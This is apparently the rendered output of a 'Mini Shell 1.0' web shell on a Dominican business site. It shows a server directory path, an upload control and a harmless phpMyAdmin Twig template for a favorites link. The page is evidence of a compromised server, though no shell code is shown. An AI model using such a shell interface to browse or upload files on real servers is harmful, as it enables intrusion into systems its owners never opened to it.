HOME


Mini Shell 1.0
Negocios La Pieza.DO | Registrate o Inicia Sesión

Inicie Sesión en su Cuenta de Negocios

Olvidó Contraseña?
DIR: /var/www/html/phpmyadmin/templates/database/structure/
Upload File :
Current File : //var/www/html/phpmyadmin/templates/database/structure/favorite_anchor.twig
<a id="{{ table_name_hash }}_favorite_anchor"
    class="ajax favorite_table_anchor"
    href="{{ url('/database/structure/favorite-table', fav_params) }}"
    title="{{ already_favorite ? 'Remove from Favorites'|trans : 'Add to Favorites'|trans }}"
    data-favtargets="{{ db_table_name_hash }}">
    {{ already_favorite ? get_icon('b_favorite') : get_icon('b_no_favorite') }}
</a>